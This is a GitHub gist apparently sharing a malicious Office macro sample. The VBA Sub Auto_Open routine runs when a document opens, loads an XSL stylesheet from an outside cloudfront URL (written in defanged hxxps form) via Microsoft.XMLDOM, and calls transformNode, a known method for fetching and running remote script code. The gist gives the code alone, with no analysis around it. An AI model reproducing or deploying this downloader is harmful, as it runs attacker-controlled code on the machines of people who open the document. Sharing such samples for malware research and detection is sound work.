Skip to content

Instantly share code, notes, and snippets.

@GitMirar
Created September 30, 2018 10:20
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save GitMirar/78115d363daee36d73979892c6b99567 to your computer and use it in GitHub Desktop.
Save GitMirar/78115d363daee36d73979892c6b99567 to your computer and use it in GitHub Desktop.
Sub Auto_Open()
Set XML = CreateObject("Microsoft.XMLDOM")
XML.async = False
Set xsl = XML
xsl.Load ("hxxps://d3nvoqkqp3htqo.cloudfront.net/p_/content")
XML.transformNode xsl
End Sub
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment